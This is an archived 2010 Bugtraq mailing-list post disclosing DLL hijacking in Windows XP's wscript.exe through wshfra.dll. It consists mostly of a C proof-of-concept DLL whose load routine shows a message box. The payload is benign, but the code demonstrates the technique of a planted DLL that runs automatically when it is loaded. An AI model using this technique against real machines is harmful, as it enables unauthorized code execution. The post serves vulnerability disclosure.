[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201008271756.o7RHuiwF013767@www3.securityfocus.com>
Date: Fri, 27 Aug 2010 11:56:44 -0600
From: info@...uritylab.ir
To: bugtraq@...urityfocus.com
Subject: Microsoft Windows wscript.exe (XP) DLL Hijacking Exploit (wshfra.dll)
=====================================================================
Founded By: Kamran Safaei Tabrizi(k4mr4n_st(at)yahoo(dot)com)
Securitylab Security Research Team
Website: http://www.securitylab.ir
Special Thanks: Mazo shinozuki, BangoDragon
=====================================================================
#include "stdafx.h"
void init() {
MessageBox(NULL,"Mazo!", "k4mr4n!",0x00000003);
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
=============================================
Powered by blists - more mailing lists